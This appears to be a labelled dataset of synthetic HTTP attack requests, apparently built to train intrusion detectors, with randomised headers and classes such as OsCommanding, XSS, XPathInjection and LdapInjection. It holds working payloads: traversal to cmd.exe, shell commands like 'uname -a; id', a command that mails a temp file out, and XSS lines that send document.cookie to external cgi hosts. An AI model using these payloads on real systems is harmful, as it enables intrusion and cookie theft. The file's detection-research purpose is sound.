~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ddceas9hie=s9I&ondd=ttdfghny8&5Rbinensh=u6VA1wfLUMs&dYt2=612&e3wxss1b=rwFbyvb7&necrol2i=2264&o8.DJnc9twinnt=auzkdW'    or     1<   uyefa/eodft/Oramew/child::text()[position()=518]     or 'rhOdh'  = '&WsfZyygBqpdqm=nWXB9lY&GIsN@K2=gTrjf&ojadusdil3h5(&ecftb=173&tnut=sz&VLLX=8e

End - Id: 48544
Start - Id: 43751
class: OsCommanding
GET /scripts/..�/../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 91.64.131.196
Connection: keep-alive
Accept: video/*, text/*, image/*
Accept-Charset: *;q=0.5
Accept-Encoding: deflate;q=0.5
Accept-Language: *
Cache-Control: tm1c=utar
Client-ip: 251.209.185.79
Cookie: 177system4YAi5=514;u2n9blpeD5=2295257394;ocoH=0776;hdzgiodpwAfew=mB dtesnph-systemaa~ y
Cookie2: $Version="087"
Date: Sat, 10 Mar 07 21:12:25 CET
ETag: W/"S2kqKS2NgMYdq_Ze"
Expect: fe8gaSr=na4I2h
From: Reoco@amlrswscus.de
If-Modified-Since: Sat, 24 Apr 10 07:43:28 GMT
If-Unmodified-Since: Sat, 14 Mar 09 15:03:08 GMT
If-Match: "1GH--iKf_fhk5Nb1."
If-None-Match: *
If-Range: Tue, 19 Oct 04 05:08:13 GMT
Max-Forwards: 4450
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Digest cnonce="rPoaihzn"
Authorization: NTLM ZTRubDJ0c3NQOW9BVTNzc2llc2VpdGR1SnRyZXB1dHdt
Range: 2335-
Referer: http://vRx8Cnel.org/3Ktopo/kjdt/cdritisc/nLuca.aspx
TE: deflate;q=0.0,trailers,deflate;q=0.6
Trailer: Max-Forwards
User-Agent: Mozilla/7.9 (Windows; U; Windows NT 4.8; ap-ii; rv:2.7.4) Gecko/95883725
UA-CPU: Sparc
UA-Disp: 624,195,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 7271x959
Via: twi/4.8 www.w2snsRo.jpeg:65, 1.5 www.c2hqy0.tiff, FTP/3.1 www.jqvjmebc.shtml
Transfer-Encoding: compress
Upgrade: 2Ytn/5.0, a8qtt/0.1
Warning: 960 13.127.188.120 "eVdond" 
X-Forwarded-For: 247.183.255.17
X-Serial-Number: 442223002
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 43751
Start - Id: 43513
class: OsCommanding
GET /updateMa/geCLOtiHaT/dabtylntensaNrdie/FK/eU_ywvgsZg@feLYAjdF/P1autoexec0mLhQi/mh7cgL_/yj6S/3p9@TxZ4d2p/updatebthconnectIautoexec1KZGw8@.gif?oyoefse=0sn&ahrsrkcdts=293&ethiwaukl=AhmtG4rtdekmeta29&wmE-b=++++%3B++++echo+++++++++%3B++w++++%3B++++uname++-a++++%3B++++id&ebandAf5=j+n+ HTTP/1.0
Host: 57.42.26.222
Connection: close
Accept: */*
Accept-Charset: macintosh;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: min-fresh=0647
Client-ip: 108.184.195.217
Cookie: O2Kbodylwinnt-J5SA=2affa;l1ano=781;rn9undree0=0970613;Es=urmxstIecxNew;esret9=he=/;6a=nhn
Cookie2: $Version="8"
Date: Thu, 20 May 04 11:21:24 GMT
ETag: "PxnNJB_jtB5FqDUJ"
Expect: 100-continue
From: rb2eklg@erhan.net
If-Modified-Since: Tue, 20 Feb 07 02:21:49 CET
If-Unmodified-Since: Fri, 09 Nov 07 01:27:22 UTC
If-Match: "F5mgpH.TGt9In-QHMPZ2"
If-None-Match: "cID5GLTs_skJKM_5"
If-Range: Mon, 10 Dec 07 23:18:19 CET
Max-Forwards: 935
MIME-Version: 3.4
Pragma: lr=tiat
Proxy-Authorization: Basic bFJvZ25nOmVmVGNx
Authorization: NTLM bnhuYXNlZU41ZWJEZGN2TGxjdHB0b2tzNWNmU29zVGZvb2k5Q3M1N084ZQ==
Range: 41-,-475,4948-
Referer: http://www.jqe9ttaa.net/snaaTrIa.php3
TE: gzip;q=0.4,trailers
Trailer: Accept-Encoding
User-Agent: ihMaceup (dfq@nUjED; 7keQniVfmd; ssHTgjz1)
UA-CPU: PowerPC
UA-Disp: 5670,938,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 5281x2497
Via: 7.6 84.74.1.199
Transfer-Encoding: compress
Upgrade: tlle/3.2, ouiu/2.7, 6nb/4.0, iuoaC/4.5, ioatma/4.1
Warning: 156 193.81.211.74 "9aeu3wesnnaer" 
X-Forwarded-For: 134.201.54.76
X-Serial-Number: 521013041943
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43513
Start - Id: 46998
class: XSS
GET /0QgxitmpG3c7553p/A6nsvp3lrsdcvnoHo/zebeibraos2Mtdiag/sxit/un/9sam7TjJTKeGDSkm/dj-JHkdbBLQ/Pbetween_i.css?aOopee5oaeehfh=vbscript%27al1osilt+xp_sshutdown5&nlc7n=%3Cform%2Bname%3Dh++%3E%3Cselect%2Bname%3Deohspa%3Ehttp%3A%2F%2Fwww.ru.com%2Feu%2F%3F%3C%2Fselect++++%3E%3C%2Fform++++%3E&biustomPn=suyhm1%3Bberbt&lRrnuXhwinNtnu=817 HTTP/1.0
Host: 175.132.191.13:99
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: iso-8859-5, iso-2022-kr;q=0.0, iso-2022-jp;q=0.1
Accept-Encoding: gzip;q=0.8, identity, gzip;q=0.6, identity;q=0.6, identity
Accept-Language: hnan-sgd;q=0.2, ifrI3u3-sh;q=0.2, Im3Ha-t1iash, rn-io;q=0.1
Cache-Control: only-if-cached
Client-ip: 0.51.121.220
Cookie: ugnpd=21;0log..k2=oeaua;smdaI=o<aiille%insert
Cookie2: $Version="5"
Date: Tue, 23 Jan 07 19:06:40 CET
ETag: "o8HdQMwRnEl_XlX"
Expect: 3vtn=oa9Wm;sdoo2=dbcNoIu8
From: vsl8rn@orhoE.de
If-Modified-Since: Sat, 28 Feb 04 09:10:24 CET
If-Unmodified-Since: Sun, 16 Jan 05 10:22:09 GMT
If-Match: "31y3tbGm0ffYRfQrxv"
If-None-Match: *
If-Range: Sun, 28 Feb 10 21:20:44 UTC
Max-Forwards: 6561
MIME-Version: 0.5
Pragma: kmrrAwtf='etoO6bo0'
Proxy-Authorization: Basic YXN3clRGOmVyY2w=
Authorization: Basic ZUVtVDp1dE50dw==
Range: 5-22964
Referer: http://www.aeehveeo.st/erni/ebots50b/hiboANum/ngemrwG/Arbbhr.html
TE: trailers
Trailer: Upgrade
User-Agent: eTXhzvsPK http://www.asts.com
UA-Disp: 0784,5825,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 238x292
Via: 4.5 www.idqx3.shtml, 5.0 103.195.142.198, 1.1 www.atzoecF.gif
Transfer-Encoding: identity
Upgrade: 5ve/2.6, a1rbm/0.6
Warning: 544 www.ccrt.gif "oteAehiueo" "Fri, 15 Apr 05 23:43:34 GMT"
X-Forwarded-For: 88.21.110.238
X-Serial-Number: 09560109
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46998
Start - Id: 46844
class: XSS
POST /calo/e3ai6cgS/tauavcgoeTnn/tnhli/dropG/eogoi.mdb? HTTP/1.0
Content-Length: 107
Content-Language: r,resdr,0
Content-Encoding: gzip
Content-Location: http://www.zfr3is.gov/asreei/iidter/sdfarrSd/Meer.php
Content-MD5: ZHQxaTQwbjFhamNnTzdsbg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 20 Mar 08 11:21:47 CET
Last-Modified: Thu, 16 Jun 05 22:09:21 GMT
Host: 12.79.97.80
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *;q=0.3
Accept-Encoding: identity, compress, deflate, deflate
Accept-Language: *
Cache-Control: max-stale
Client-ip: 43.123.2.34
Cookie: ykcayt7t=eliiS1DF0XO;hul=wuAd1Z9EeQM;IwhereTHservicesMC40=txraceejw9dx3ia0s;9Es=3lfLmen3ctt
Cookie2: $Version="455"
Date: Sun, 11 Jan 04 10:13:57 UTC
ETag: "jzY25ePpsai@EB.S_"
Expect: 100-continue
From: fassgdh4@tikal0.com
If-Modified-Since: Mon, 11 Feb 08 19:34:34 GMT
If-Unmodified-Since: Tue, 07 Aug 07 08:24:33 UTC
If-Match: "mMUMY6aLY@fQkiD4x"
If-None-Match: *
If-Range: *
Max-Forwards: 20
MIME-Version: 2.6
Pragma: kswl='m6Uenf'
Proxy-Authorization: Digest opaque="5iwrlmu"
Authorization: Basic ZGdyZ3ZmcTpzZ2x0bQ==
Range: -85
Referer: http://unsp3ot.org/coittyze/wetLcioT/ausuauSt/ry56.pdf
TE: trailers,trailers
Trailer: Referer
User-Agent: Mozilla/9.5 (Windows; U; Win 9x 7.0; tw-Et; rv:7.7.1) Gecko/71196455
UA-CPU: Sparc
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 818x5674
Via: FTP/0.8 171.91.229.27:70198, 8.1 199.243.97.31, HTTP/7.0 237.140.236.126
Transfer-Encoding: compress
Upgrade: ccSen/7.1
Warning: 515 www.wruorr.jpg "seuttb" 
X-Forwarded-For: 67.114.213.31
X-Serial-Number: 93268691782079750245
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

aeymagUhteus=<script>alert    (     "a1LeB201alaknsb.myoat")</script    >&iaMotn=57109602

End - Id: 46844
Start - Id: 47313
class: XSS
GET /hoAetrkoHoSqh/1Idu/3H_ieELmxZdJq3/aiUmd/pTrEzO6aelvD.pX-/zE1gN.H10LQWZ4f2tiC/eutEen4niu6Iu3sbed/rcfAn/uydoNTphcbl/tjNeJfijFj_ho/yOHn6AFLlExx.jpeg?aL=%26%7B%5Balert+++%28%27t2eeeane%27%29%3B%5D%7D%3B&ib5x8afkc=722868&2SLxp_Yhome=0p&nhmerafthne=331704&Fimgs5OopenbUm-usr=372&yOeckTc0h=amV6%40Qz0MJS%40 HTTP/1.0
Host: www.eIeyiHat.uk:80
Connection: close
Accept: audio/*;q=0.9, audio/basic
Accept-Charset: *
Accept-Encoding: compress;q=0.8, deflate;q=0.1
Accept-Language: *;q=0.4
Cache-Control: no-transform
Client-ip: 107.154.88.110
Cookie: Sst=fsgJnnad&erMbp;xeeomd=ujrEmpbt;tsecnfhrr=o@ira;cmd7jKJVZ9TO=iy'vbscripthtpassrvobject>FR smtawc
Cookie2: $Version="508"
Date: Tue, 18 Aug 09 09:33:18 UTC
ETag: W/"kmh.JRxb6nN3qMqK1"
Expect: hdetmBe
From: ntsn@eneotga.ch
If-Modified-Since: Wed, 25 Oct 06 11:22:27 CET
If-Unmodified-Since: Mon, 23 Mar 09 22:34:42 CET
If-Match: "RFO3_ioNHVUtn7_90p"
If-None-Match: *
If-Range: Sat, 31 Jul 04 18:02:18 GMT
Max-Forwards: 996
MIME-Version: 0.1
Pragma: xieNf=iqeoraa
Proxy-Authorization: Digest cnonce="izenb6"
Authorization: NTLM aW56aHJzbWhmdG56bDllb3dhdHN3aXlkZ2hOZXV3Z3NhM3JldWZxeW1mZDJhbDMx
Range: 498-
Referer: /ucaf/ee6eide.jpeg
TE: gzip;q=0.0,gzip,trailers
Trailer: Accept-Encoding
User-Agent: 55JPwsDS http://www.Tttaadt.uk
UA-CPU: Sparc
UA-Disp: 8442,560,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 5306x1733
Via: FTP/8.4 232.168.110.151, 7.2 www.reean3ty.jpeg
Transfer-Encoding: lgxk
Upgrade: ddnzgk/3.0, pnnt/9.2, eehf/9.2
Warning: 318 www.lawraii.gif:81 "spet7rfthtnscentm3" "Thu, 05 Aug 04 21:32:03 CET"
X-Forwarded-For: 46.124.140.98
X-Serial-Number: 126620
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 47313
Start - Id: 36919
class: LdapInjection
POST /ntcwrmrdIpNuodiao/openCMy/@rtB2/hops8wp-Wwhere/ac-r/ttldcccsAioSii/noec4loIO/6ydessujpg4nnnn/omIi/Oamvne8ycoiiz/e6.dll? HTTP/1.1
Content-Length: 134
Content-Language: oinE4l,oieese7s
Content-Encoding: compress
Content-Location: http://www.Fasuoe.ch/enhc/6oi2ni.msf
Content-MD5: b3NhdG91aWVwaXphdWVmZA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 19 Sep 05 18:44:20 GMT
Last-Modified: Fri, 04 Dec 09 11:32:05 UTC
Host: www.mafsret.st
Connection: aNlqhte
Accept: */*;q=0.6
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 23.24.154.22
Cookie: dpssnImsEk2=464134776;cmdtgsetck=ln93VQnjm6w;0Y9vr@6phpK=1YUU;ddmiotoalgnu=o23;yicdoqn=|yiMsaw
Cookie2: $Version="09"
Date: Sat, 02 Jan 10 08:52:10 UTC
ETag: W/"Kz7Dmc-HYJYpwWQd6ii"
Expect: 100-continue
From: dhafadn@folsiatle.com
If-Modified-Since: Fri, 01 Dec 06 22:26:15 CET
If-Unmodified-Since: Sun, 22 Mar 09 13:07:45 GMT
If-Match: "SqEw28g1znnBLeF4MU"
If-None-Match: "Qj_@WAhd4eNjgvH3S"
If-Range: Sat, 19 Sep 09 21:57:07 UTC
Max-Forwards: 928
MIME-Version: 8.8
Pragma: oao=ioetr0ti
Proxy-Authorization: NTLM cmVlZXRyZWdpYWJlb3N0ZUFPdGd6bm85Ym5jbndpdG5jc2Vxc2J1YVNlcg==
Authorization: Digest algorithm=MD5-sess
Range: 03-
Referer: /npfhm/ow4E/eefhcqFo/ecIes/rEes1eri.jpg
TE: trailers,gzip;q=0.5
Trailer: If-Match
User-Agent: Mozilla/8.7 (X11; U; SunOS sun4u 6.8; qt-ol; rv:9.0.2) Gecko/30798142
UA-CPU: Sparc
UA-Disp: 0609,6015,16
UA-OS: Win98
UA-Pixels: 015x0585
Via: 0.9 www.4sseen6y.css:88198, FTP/9.2 www.tatane.css
Transfer-Encoding: gzip
Upgrade: i66/6.1
Warning: 029 17.241.6.13:76 "8tya4sneebfR" "Fri, 14 Mar 08 05:58:01 GMT"
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

5teshnRsan4su2=tAaHeqrop&Ttnoh11spnap=5981)(&(objectClass=otte)(|(sn    =e9h)(cn=t     J*))&1teoh=820344

End - Id: 36919
Start - Id: 49793
class: XPathInjection
GET /aIwvbscriptallEjSiL9qO/metiadaeyeznme/NVjRhjjnservices7/n7erNsmhethmnSga/dIpYGZ.QUgv7qe2Vs/tvw5kPi9pD8w.php3?wrhnqli0lj3a=aebi&4ca1Aea2Ciloh=tse7n%27+++or+path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D+or+%27s2truz3%27++++%3D+%27&pl1r=14&linl=co HTTP/1.1
Host: www.sadnaBwn.fr:80
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.0
Accept-Language: sp-Uxeyy8li, Na-meebcrhq;q=0.1
Cache-Control: no-transform
Client-ip: 189.86.236.48
Cookie: certth=o;igonkkeBaImtodr=n@Esadig0tpoN+t;rf4ey=709;astryTtlfmru=Al ee ir;llcyneA=nst
Cookie2: $Version="30"
Date: Wed, 06 Jan 10 22:24:01 GMT
ETag: W/"8Nw-K59c314vRFuXk"
Expect: o7eBsmo9
From: soenml@saae0wd.org
If-Modified-Since: Mon, 21 Jun 04 11:25:33 UTC
If-Unmodified-Since: Tue, 16 Jan 07 03:39:54 UTC
If-Match: "INpItTVHZ3I-SkGHxveB"
If-None-Match: "XQEPajdmxpZtqu1yBy"
If-Range: Mon, 04 Jun 07 18:06:18 GMT
Max-Forwards: 2835
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Basic em9mVks6c3JuaWVuZmU=
Range: 1-,586-,-3399
Referer: http://www.6mnuolH.net/tsimp2hr/ragd/teuhnpGe/tasnt/diyonmwu.jpeg
TE: trailers
Trailer: Connection
User-Agent: eAis7ngmr1Tg2
UA-CPU: x86
UA-Disp: 662,518,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 742x2872
Via: blani/4.6 229.12.67.27, FTP/6.6 www.Ng5s2.shtml, 9.5 250.149.189.69
Transfer-Encoding: deflate
Upgrade: afn/1.9, wee/7.0
Warning: 972 67.57.148.71 "btc9redfdijsq0" 
X-Forwarded-For: 203.64.166.11
X-Serial-Number: 13614993900789849
----: ---------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 49793
Start - Id: 47320
class: XSS
GET /QXBeUzY/6i/rtaxbHmotie3trtRiae.php4?tah6gytatsl=%26%7B%5Bdocument.location.replace+++%28%27http%3A%2F%2Fwww.ll.com%2Fcgi-bin%2Fngnsta.cgi%27%2Bdocument.cookie%29%3B%5D%7D%3B&tanst=htstdine&PNou6ln=u6X3_&rn0r1aaEe7nS=81&C@KVeSZ=684&hee=3&yr=i.c_&aebh=c&50oeddaurn5dsa=rfK&7meioo5ymsbuei=roaireuastiee&t1=6&ytedealomaisDt=8oform HTTP/1.1
Host: www.onpaighs.net
Connection: close
Accept: video/quicktime;q=0.4, audio/x-wav;q=0.4, text/*
Accept-Charset: hz-gb-2312, iso-8859-8-i;q=0.9
Accept-Encoding: identity;q=0.6, compress, deflate;q=0.4
Accept-Language: *;q=0.1
Cache-Control: max-stale
Client-ip: 188.124.236.19
Cookie: etroTrrE6=dt;ptibnoeotrsaeal=2147;tnsgFwcnieenc=fents
Cookie2: $Version="508"
Date: Tue, 25 Sep 07 03:37:35 GMT
ETag: W/"@-3igXFzz.XbYHw@rM"
Expect: 100-continue
From: fvc2@eesg.net
If-Modified-Since: Thu, 26 Feb 09 07:36:01 GMT
If-Unmodified-Since: Sun, 06 Aug 06 13:47:18 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 34
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: Digest cnonce="izenb6"
Authorization: Digest uri=http://www.kiaenw3.st/ehjeCct/ffEvEde/rm4i/ymaoit/rasiham.cgi
Range: -827060,69-,229-399617
Referer: /e2hrzmao/HnErhce/aiitz2a/totsa.jsp
TE: chunked;q=0.5
Trailer: If-Match
User-Agent: Mozilla/3.3 (compatible; Ieest0; Win98; OrtrTe; wTrrOt)
UA-CPU: Sparc
UA-Disp: 6722,405,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 5306x1733
Via: 9.1 www.6zts.jpg, kl6eeo/5.0 www.igaensu.jpg, ttlasm/7.8 129.171.210.3
Transfer-Encoding: identity
Upgrade: eoea/3.2, whp5n/5.7, nto/1.7, nsa/0.9
Warning: 318 www.lawraii.gif:81 "spet7rfthtnscentm3" "Thu, 05 Aug 04 21:32:03 CET"
X-Forwarded-For: 151.1.251.143
X-Serial-Number: 126620
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 47320
Start - Id: 47465
class: XSS
GET /hvrEnXFP3IvDZ@/l8_hH67Vh/Rosdlua/aadAks0n9shenm2ysws.tiff?vJcedemowV7y=o%40HlZLcGS&4ThbhtnesieAbs=8tr1gnm&tuTzinrsmudi=%3Cbody+++onload%3D+++%22+%5Bdocument.location.replace+%28%27http%3A%2F%2Fwww.na.com%2Fcgi-bin%2Friasel.cgi%27%2Bdocument.cookie%29%3B%5D+++%22+++%3E&9where_N1R.0d=25708753 HTTP/1.1
Host: www.emle.de:80
Connection: keep-alive
Accept: text/html
Accept-Charset: *;q=0.6
Accept-Encoding: compress, gzip;q=0.5, identity;q=0.7, identity
Accept-Language: *;q=0.6
Cache-Control: no-store
Client-ip: 146.143.28.253
Cookie: hlceiHdePz=519;ntdlyesthIpi=bftLsY9;eeAnico=11;stoanepeammsnd=;n7tdropmteh;i42i0ojTso=i\;ceAtaynlhtaehp=ehtgroup byeLh
Cookie2: $Version="305"
Date: Mon, 29 Mar 04 07:08:20 GMT
ETag: "fYGqXmn1pS7FiGc"
Expect: 100-continue
From: oou9@rIjx.it
If-Modified-Since: Tue, 21 Jun 05 01:44:56 UTC
If-Unmodified-Since: Fri, 29 Sep 06 12:24:47 CET
If-Match: "8lZ-UlJyt.5TcJ3Ue"
If-None-Match: *
If-Range: Wed, 07 May 08 07:22:11 UTC
Max-Forwards: 9988
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: ohttg htuneE=et8ju
Authorization: Digest cnonce="rfhe"
Range: -8,89-
Referer: /oesod/muvtsgap/Neesaam/m9ldho6a.msf
TE: deflate,deflate;q=0.8,gzip;q=0.8
Trailer: From
User-Agent: loLxSumh http://www.qtam.ch
UA-CPU: MIPS
UA-Disp: 2372,1267,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 4671x382
Via: 9.5 214.176.0.28:6399, FTP/5.2 www.nsej.png:9, zaeuRq/9.2 www.pybkrou.htm
Transfer-Encoding: deflate
Upgrade: rshhh0/1.3
Warning: 308 www.aenio10r.gif "lnesbftg" "Sun, 10 Aug 08 14:30:39 UTC"
X-Forwarded-For: 250.184.177.153
X-Serial-Number: 48112496441051
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 47465
Start - Id: 46993
class: XSS
GET /tteceehdao2yealE/m7a3Tf.Ng40fDFeuOc/zM6YNXg0V9JjK/75FumlF3kCLslxU5F-/r8iVuYRyPSBIEp/68MJ0.nsf?xenaeoeezetCeai=rrknu+t&umhtu4ed8zieTa=179016111&nruriCbouae=tq8itaaoes&s5nodlfiriojl=ysY5trtetpwo&nntahye5nhs0c=6kgFC%40_M&enbatleedrCr=%3Cbgsound+++src++++%3D%22++javascript%3A+++%5Balert+%28%27aom%27%29%3B%5D%22++%3E&HmpvF-.J.NC=reoean&wu.t=22335&sXshehni3sy=7toe7acn&lcntm2aaixpre=eTw%2FG HTTP/1.1
Host: www.2Bmlocnc.ch:80
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: nXho-oe2s;q=0.2, e0U5O-elnhEown;q=0.1, crhsg6s-9sxhHixh;q=0.6
Cache-Control: no-cache
Client-ip: 0.51.121.220
Cookie: Ah3aTE=)ssls3as00oy;clfothn8=e1hoPatcaQ;5itgu=02717
Cookie2: $Version="468"
Date: Sun, 17 Sep 06 15:52:22 UTC
ETag: "f-DBP8aMNHaaIY12Y"
Expect: 3vtn=oa9Wm;sdoo2=dbcNoIu8
From: wj0oee@a4ld5r2exe.uk
If-Modified-Since: Tue, 12 Jan 10 21:51:13 UTC
If-Unmodified-Since: Sun, 23 Sep 07 04:05:18 CET
If-Match: "v7bhnFPjZJoYNz5Ci"
If-None-Match: *
If-Range: "DzDJpdX@FFDYvvts"
Max-Forwards: 038
MIME-Version: 0.5
Pragma: rlane2i='2'
Proxy-Authorization: Basic YXN3clRGOmVyY2w=
Authorization: Basic d29oT2U3dDplYUhlc3RJ
Range: 5-22964
Referer: http://www.ehyoi1ha.fr/5aRepire/aneex/ssdeo9/ac4S.css
TE: trailers
Trailer: Upgrade
User-Agent: WcdhoY6ng/7.5.2.3.6
UA-Disp: 2976,173,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 238x292
Via: 0.7 27.63.43.123, FTP/6.6 136.74.190.220, 0.3 www.essO2.html
Transfer-Encoding: identity
Upgrade: 4il/0.7, 4aTrnW/6.9, 7fuM/5.0, sih/2.0
Warning: 352 28.5.137.111:2561 "wEaonerhna" "Mon, 13 Sep 04 13:04:56 UTC"
X-Forwarded-For: 88.21.110.238
X-Serial-Number: 09560109
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46993
Start - Id: 48676
class: XPathInjection
PUT /eiTsEnx6dnenedTseU/ehisoqalr/42XZnpTui8DV/0.Pcqw6AQ97g.8SuxY.shtml? HTTP/1.1
Content-Length: 398
Content-Language: shy,v
Content-Encoding: gzip
Content-Location: http://www.foeisosa.org/Nna25r/ihunrwf/nnmd/thina/aedmiby.php4
Content-MD5: MGl0aUxZaGFvZWFkYmhudA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 29 Jul 09 17:53:57 GMT
Last-Modified: Thu, 15 Jun 06 23:18:11 UTC
Host: www.cgretedttt.ch
Connection: close
Accept: text/xml;q=0.3, image/jpeg
Accept-Charset: *;q=0.2
Accept-Encoding: deflate, identity, gzip
Accept-Language: np5a3a-c;q=0.6, p-haare, itp-o;q=0.7
Cache-Control: max-stale=36
Client-ip: 19.192.239.127
Cookie: roAl0sujsdcPqh=362160
Cookie2: $Version="33"
Date: Fri, 18 Nov 05 22:04:58 GMT
ETag: "3.OeJwn1snCY3-uU"
Expect: 100-continue
From: NpAbn@exte7naon.de
If-Modified-Since: Sun, 26 Dec 04 08:16:46 GMT
If-Unmodified-Since: Thu, 01 Nov 07 09:42:44 CET
If-Match: "w65.tM-.nZn0euO1qe"
If-None-Match: "I03hGRH@XT3ckXG2r"
If-Range: Wed, 29 Aug 07 13:48:10 UTC
Max-Forwards: 8010
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Basic amg4c0VuczpodGgyaW5z
Range: 12-
Referer: http://nrec.ch/tees6e/no5tsa9/riase.css
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/1.0 (Machintosh; U; Mac OS X 4.7; yr-aw; rv:0.7.9) Gecko/73996187
UA-CPU: MIPS
UA-Disp: 9891,852,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 2607x8764
Via: HTTP/1.2 22.29.184.224, HTTP/2.0 44.128.131.106
Transfer-Encoding: itdw0w
Upgrade: Bkmi/2.1, eLo/9.3
Warning: 456 136.21.126.138:79216 "9ErN6ntiDgwn" 
X-Forwarded-For: 32.231.214.148
X-Serial-Number: 9550547356245150782
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

rbmsOae=dbEouLDFe&othensp7ed=dolhz&ota24ei5eo=oowTV.&nriisfe=sd&jA=818&Ylgetris5ihkat=erupdate4lq&sIeiprsirdenao=selGhnjstpnt&liIder5= ont&n2l=et &dldnmdtnse6ol=7482  or 1<   tn4l/9r/t/child::text()[position()=748]  or 2='] | /* | /foo[bar='&RLWautoexecZkyWHodelete=dqSiXR-&e6ij=>>hkesisdacins5 r=eS&tsm=083874&d3wsZ65li=frneiOnltv &odtaeo=vcn?

End - Id: 48676
Start - Id: 49702
class: XPathInjection
GET /mata37ey/yhntsadsTadi.mspx?fr3stcgoTz=529472705&ao=sftn%27%5D++%7C++++P++++%7C++++%2F%2Fuser%5B+name%2Ftext%28+%29+++%3D+++%27j5&beqSdD=eo+m%3B+bhttgtvars%29dt HTTP/1.0
Host: www.sa2yc.de
Connection: close
Accept: video/mpeg;q=0.2, audio/*
Accept-Charset: x-mac-korean, iso-8859-15;q=0.2, iso-8859-15;q=0.7, cp-950;q=0.8
Accept-Encoding: gzip;q=0.8, compress, compress, identity;q=0.9
Accept-Language: *;q=0.3
Cache-Control: max-age=4
Client-ip: 251.247.9.85
Cookie: Teftgoaelojrax=9tNhutrv;aeTtanieqwrdi=giXCF_tvV8;angse=ly7-Yd-4;ualaqkGn7br24=20264302
Cookie2: $Version="4"
Date: Fri, 10 Feb 06 22:16:50 GMT
ETag: W/"s3klw_r.kke6tQh"
Expect: iaeoct=i0eao6Xh;aoccEe=barnyz
From: tmHtei@9Eaetn4.de
If-Modified-Since: Mon, 04 Jan 10 03:07:35 GMT
If-Unmodified-Since: Thu, 09 Sep 04 13:36:03 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 31 Jan 07 07:51:14 CET
Max-Forwards: 30
MIME-Version: 4.8
Pragma: astao5rF=neeiei
Proxy-Authorization: Digest response="3EBCB3A2aaB0a8C77f9b20Ae891C650D"
Authorization: Digest nonce
Range: -394122
Referer: /a73i/cnsoa.cfm
TE: trailers
Trailer: Accept-Language
User-Agent: Mozilla/2.4 (Windows; U; Windows NT 1.9; st-nl; rv:5.0.5) Gecko/17515252
UA-CPU: StrongARM
UA-Disp: 2722,5111,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 6094x1402
Via: b7oere/7.9 129.234.83.240, HTTP/0.6 www.ozexwa.png:43, 7.9 www.iefih.jpeg
Transfer-Encoding: s9tetd
Upgrade: ierniu/6.4, ytteh/9.3, ahoito/8.8
Warning: 928 www.sea4hf7.png:6529 "guetn6bIulNebhuhnEd" "Fri, 08 Apr 05 24:10:56 UTC"
X-Forwarded-For: 76.177.20.101
X-Serial-Number: 58499118
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 49702
Start - Id: 36811
class: OsCommanding
GET /n4pY7@X6ePE-wuR.x/Oaprynnce3aetoxencq8/kVg8tNCpJ2s4qv2sZA01/ePg5HXS1TuBb7z_OYdH/tsB/bVD/8fioamsadbhptttscnr/8u8/cv/a5ersmtbo1s5mo/cwS9-u7kcigku/gA.css?1dr6fggde8seb=%27+++++%3Bcat++%2Ftmp%2Fres++mail++le%40ar.com++++%3B HTTP/1.0
Host: 147.27.143.206:9
Connection: hiPretwE
Accept: text/plain;q=0.0, text/*
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 252.242.181.142
Cookie: ttifchmi=5633568;AnisW-9pHw=ogA TCofcw;adea4asndpEzgc=55
Cookie2: $Version="089"
